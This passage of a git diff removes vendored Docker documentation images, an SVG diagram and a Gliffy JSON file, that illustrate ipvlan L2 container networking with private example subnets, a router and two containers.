transform="scale(0.8771929824561404,1.7543859649122808)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 103.99999999999999 0 Q 113.99999999999999 0 113.99999999999999 10 L 113.99999999999999 46.99999999999999 Q 113.99999999999999 56.99999999999999 103.99999999999999 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" opacity="0.97"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 103.99999999999999 0 Q 113.99999999999999 0 113.99999999999999 10 L 113.99999999999999 46.99999999999999 Q 113.99999999999999 56.99999999999999 103.99999999999999 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.97"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,300,276)"><g><g transform="translate(0,0) scale(1.14,0.57)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.8771929824561404,1.7543859649122808)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 103.99999999999999 0 Q 113.99999999999999 0 113.99999999999999 10 L 113.99999999999999 46.99999999999999 Q 113.99999999999999 56.99999999999999 103.99999999999999 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" opacity="0.97"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 103.99999999999999 0 Q 113.99999999999999 0 113.99999999999999 10 L 113.99999999999999 46.99999999999999 Q 113.99999999999999 56.99999999999999 103.99999999999999 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.97"/></g></g></g></g></g><g transform="matrix(1,0,0,1,310,283)"><g transform="translate(93,71) matrix(1,0,0,1,0,0) translate(-93,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="94" height="44" fill-opacity="0"/></g></g><g transform="translate(93,71) matrix(1,0,0,1,0,0) translate(-93,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="94" height="14" fill-opacity="0"/></g></g><g transform="translate(93,71) matrix(1,0,0,1,0,0) translate(-93,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="14" y="0" width="67" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="14" y="12">Container</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="66" y="12">(</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="70" y="12">s</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="76" y="12">)</text></g><g transform="translate(93,71) matrix(1,0,0,1,0,0) translate(-93,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="94" height="30" fill-opacity="0"/></g></g><g transform="translate(93,71) matrix(1,0,0,1,0,0) translate(-93,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="34" y="14" width="73" height="30" fill-opacity="0"/></g></g><g transform="translate(93,71) matrix(1,0,0,1,0,0) translate(-93,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="34" y="14" width="73" height="30" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="34" y="27">Eth0</text></g><g transform="translate(93,71) matrix(1,0,0,1,0,0) translate(-93,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="11" y="29" width="73" height="15" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="11" y="42">10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="26" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="29" y="42">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="36" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="40" y="42">20</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="54" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="58" y="42">x</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="65" y="42">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="69" y="42">24</text></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,44,296)"><g><g transform="translate(0,0) scale(1.14,0.57)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.8771929824561404,1.7543859649122808)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 103.99999999999999 0 Q 113.99999999999999 0 113.99999999999999 10 L 113.99999999999999 46.99999999999999 Q 113.99999999999999 56.99999999999999 103.99999999999999 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" opacity="0.97"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 103.99999999999999 0 Q 113.99999999999999 0 113.99999999999999 10 L 113.99999999999999 46.99999999999999 Q 113.99999999999999 56.99999999999999 103.99999999999999 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.97"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,34,286)"><g><g transform="translate(0,0) scale(1.14,0.57)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.8771929824561404,1.7543859649122808)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 103.99999999999999 0 Q 113.99999999999999 0 113.99999999999999 10 L 113.99999999999999 46.99999999999999 Q 113.99999999999999 56.99999999999999 103.99999999999999 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" opacity="0.97"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 103.99999999999999 0 Q 113.99999999999999 0 113.99999999999999 10 L 113.99999999999999 46.99999999999999 Q 113.99999999999999 56.99999999999999 103.99999999999999 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.97"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,24,276)"><g><g transform="translate(0,0) scale(1.14,0.57)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.8771929824561404,1.7543859649122808)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 103.99999999999999 0 Q 113.99999999999999 0 113.99999999999999 10 L 113.99999999999999 46.99999999999999 Q 113.99999999999999 56.99999999999999 103.99999999999999 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" opacity="0.97"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 103.99999999999999 0 Q 113.99999999999999 0 113.99999999999999 10 L 113.99999999999999 46.99999999999999 Q 113.99999999999999 56.99999999999999 103.99999999999999 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.97"/></g></g></g></g></g><g transform="matrix(1,0,0,1,34,283)"><g transform="translate(85,100) matrix(1,0,0,1,0,0) translate(-85,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="94" height="43" fill-opacity="0"/></g></g><g transform="translate(85,100) matrix(1,0,0,1,0,0) translate(-85,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="94" height="14" fill-opacity="0"/></g></g><g transform="translate(85,100) matrix(1,0,0,1,0,0) translate(-85,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="14" y="0" width="67" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="14" y="12">Container</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="66" y="12">(</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="70" y="12">s</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="76" y="12">)</text></g><g transform="translate(85,100) matrix(1,0,0,1,0,0) translate(-85,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="94" height="15" fill-opacity="0"/></g></g><g transform="translate(85,100) matrix(1,0,0,1,0,0) translate(-85,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="32" y="14" width="31" height="15" fill-opacity="0"/></g></g><g transform="translate(85,100) matrix(1,0,0,1,0,0) translate(-85,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="32" y="14" width="31" height="15" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="32" y="27">Eth0</text></g><g transform="translate(85,100) matrix(1,0,0,1,0,0) translate(-85,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="29" width="94" height="14" fill-opacity="0"/></g></g><g transform="translate(85,100) matrix(1,0,0,1,0,0) translate(-85,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="7" y="29" width="81" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="7" y="41">172</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="27" y="41">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="31" y="41">16</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="44" y="41">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="47" y="41">20</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="61" y="41">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="64" y="41">x</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="71" y="41">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="74" y="41">24</text></g></g><g transform="matrix(1,0,0,1,147,278)"><image width="170" height="60" preserveAspectRatio="none" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAKoAAAA8CAYAAAD2SSHcAAADKElEQVR4Ae3ZPWgTYRzH8SYx4gu4CG5CDAkoOAkdsiYh6GwzqEMHB1FwUREaEU7roE5KwUm6uAihc8krMUtwc3QwAREUqRIXI2he/F0xEGgSr2fvTb6B48Jzz+vn+ee5uycLC3wQQAABBBBAAAEEEEAAAQQQQAABBBBAAAEEEEAAAQQQQAABBBBAAAEEEEAAAQQQQAABBBBAAAEEEEAAAQQQQAABBBBAAAEEEAi6QCjoA/BR/wNlGfER3MyuZDKZxXg8/iKZTL5ut9tfZmbkgmWBXC53LBaLVRKJxLtOp/PeckGPMu7zqF1LzQrz5GAweKDM5y0VINNuBVLD4bChhWAzHA4XKpXKm91W4FZ+XwaqAvS4AtTQsSyIQKz6bk2YQ+2cU8CezWazL3W+W6/X2w61Y7taXwWqftlHNZKCAvSazgdsj4qCdgRCo9HoQigUWkqn08+j0ehqqVT6ZKciJ8r4IlC1gh5WcN7QAG/pOOLEQKnTskBUwXq13+8va+F4qnl53Gg0vlku7VDGsEP1Wqo2n8/v1+3mujC2VOC+DoLUkpwrmQ6plZVIJLKlgL2dSqUOutLqjEY82aIwDCPcbDYv6Zd7T/06MaNvO5KFdqpcLr81LwhvtCPDREKtVps7NsrP95ugHH/9aM6XVtp1rbD9caJbZ09XVLcGSTvBF5i76jg9PPPW3+12r+gh/pHa+uutZXJFdbpv/3v95j6qHrk+WxinuXre6fV6a61W64eF/I5k8fRlqlgs/tSo1oS2zsuUI/P7L5X2VNg3L1OeBupYUc+d3/V9Vc+Nz3Qu6GB7aozj/vmX7nBsT81z1wvQV12/qRX2iVZYQ9/Z8J8HtrfXRnpZ8u2Gvy9fprTCflDQXtYz6WnNxcbezge1TREw/0I9U61WL/rxXymzv7649U+B2076sxW1pEeCRSU8nJWPdNsCLQXoiv7jf2W7BgpOFfB0l2Jqj4KbiGVw546eI4AAAggggAACCCCAAAIIIIAAAggggAACCCCAAAIIIIAAAggggAACCCCAAAIIIIAAAggggAACCCCAAAIIIIAAAggggAACCGwL/AYbB9txUIt6ngAAAABJRU5ErkJggg==" transform="translate(0,0)"/></g><g transform="matrix(1,0,0,1,169,33)"><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="132" height="32" fill-opacity="0"/></g></g><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="132" height="16" fill-opacity="0"/></g></g><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="8" y="0" width="116" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="8" y="14">Physical</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="69" y="14">Network</text></g></g></g></svg>
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.gliffy b/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.gliffy
deleted file mode 100644
index 41b0475dfa..0000000000
--- a/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.gliffy
+++ /dev/null
@@ -1 +0,0 @@
-{"contentType":"application/gliffy+json","version":"1.3","stage":{"background":"#ffffff","width":323,"height":292,"nodeIndex":211,"autoFit":true,"exportBorder":false,"gridOn":true,"snapToGrid":false,"drawingGuidesOn":false,"pageBreaksOn":false,"printGridOn":false,"printPaper":"LETTER","printShrinkToFit":false,"printPortrait":true,"maxWidth":5000,"maxHeight":5000,"themeData":null,"viewportType":"default","fitBB":{"min":{"x":16,"y":21.51999694824218},"max":{"x":323,"y":291.5}},"printModel":{"pageSize":"a4","portrait":false,"fitToOnePage":false,"displayPageBreaks":false},"objects":[{"x":241.0,"y":36.0,"rotation":0.0,"id":199,"width":73.00000000000003,"height":40.150000000000006,"uid":"com.gliffy.shape.network.network_v4.business.router","order":41,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.network.network_v4.business.router","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#3966A0","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":85.0,"y":50.0,"rotation":0.0,"id":150,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":37,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#999999","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[3.1159999999999997,6.359996948242184],[85.55799999999999,6.359996948242184],[85.55799999999999,62.0],[84.0,62.0]],"lockSegments":{"1":true},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":22.803646598905374,"y":21.51999694824218,"rotation":0.0,"id":134,"width":64.31235340109463,"height":90.0,"uid":"com.gliffy.shape.cisco.cisco_v1.servers.standard_host","order":43,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.servers.standard_host","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#3d85c6","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":87.0,"y":24.199996948242188,"rotation":0.0,"id":187,"width":105.0,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":39,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:left;\"><span style=\"\">eth0 192.168.1.0/24</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":147.0,"y":50.0,"rotation":0.0,"id":196,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":40,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":199,"py":0.5,"px":0.0}}},"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#999999","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-82.00001598011289,6.075000000000003],[94.0,6.075000000000003]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":220.0,"y":79.19999694824219,"rotation":0.0,"id":207,"width":105.0,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":42,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"\">Network Router</span></p><p style=\"text-align:center;\"><span style=\"\">192.168.1.1/24</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":27.38636363636374,"y":108.14285409109937,"rotation":0.0,"id":129,"width":262.0,"height":124.0,"uid":"com.gliffy.shape.iphone.iphone_ios7.icons_glyphs.glyph_cloud","order":44,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.iphone.iphone_ios7.icons_glyphs.glyph_cloud","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#929292","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":33.0,"y":157.96785409109907,"rotation":0.0,"id":114,"width":150.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":16,"lockAspectRatio":false,"lockShape":false,"children":[{"x":44.0,"y":2.9951060358893704,"rotation":0.0,"id":95,"width":62.0,"height":36.17618270799329,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":4,"lockAspectRatio":false,"lockShape":false,"children":[{"x":29.139999999999997,"y":3.2300163132136848,"rotation":0.0,"id":96,"width":3.719999999999998,"height":29.7161500815659,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":13,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":99,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":99,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.8599999999999994,-1.2920065252854727],[1.8599999999999994,31.0081566068514]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":51.46,"y":3.2300163132136848,"rotation":0.0,"id":97,"width":1.2156862745098034,"height":31.008156606851365,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":10,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-1.4193795664340882,-1.292006525285804],[-1.4193795664340882,31.008156606851536]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":9.919999999999993,"y":1.5073409461663854,"rotation":0.0,"id":98,"width":1.239999999999999,"height":31.008156606851365,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":7,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[2.0393795664339223,0.4306688417619762],[2.0393795664339223,32.73083197389853]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":1.9380097879282103,"rotation":0.0,"id":99,"width":62.0,"height":32.300163132136866,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":2,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#6fa8dc","fillColor":"#3d85c6","gradient":true,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":38.326264274062034,"rotation":0.0,"id":112,"width":150.0,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":15,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-family:Arial;font-size:12px;\"><span style=\"\">container1</span></span></p><p style=\"text-align:center;\"><span style=\"font-family:Arial;font-size:12px;\"><span style=\"\">192.168.1.2/24</span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":124.0,"y":157.96785409109907,"rotation":0.0,"id":115,"width":150.0,"height":58.99999999999999,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":33,"lockAspectRatio":false,"lockShape":false,"children":[{"x":44.0,"y":2.94518760195788,"rotation":0.0,"id":116,"width":62.0,"height":35.573246329526725,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":21,"lockAspectRatio":false,"lockShape":false,"children":[{"x":29.139999999999997,"y":3.1761827079934557,"rotation":0.0,"id":117,"width":3.719999999999998,"height":29.220880913539798,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":30,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":120,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":120,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.8600000000000136,-1.2704730831974018],[1.8600000000000136,30.49135399673719]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":51.46,"y":3.1761827079934557,"rotation":0.0,"id":118,"width":1.2156862745098034,"height":30.49135399673717,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":27,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-1.4193795664340882,-1.2704730831977067],[-1.4193795664340882,30.491353996737335]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":9.919999999999993,"y":1.482218597063612,"rotation":0.0,"id":119,"width":1.239999999999999,"height":30.49135399673717,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":24,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[2.0393795664339223,0.42349102773260977],[2.0393795664339223,32.185318107666895]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":1.9057096247960732,"rotation":0.0,"id":120,"width":62.0,"height":31.76182707993458,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":19,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#6fa8dc","fillColor":"#3d85c6","gradient":true,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":36.36247960848299,"rotation":0.0,"id":121,"width":150.0,"height":30.183360522022674,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":32,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-family:Arial;font-size:12px;\"><span style=\"\">container2</span></span></p><p style=\"text-align:center;\"><span 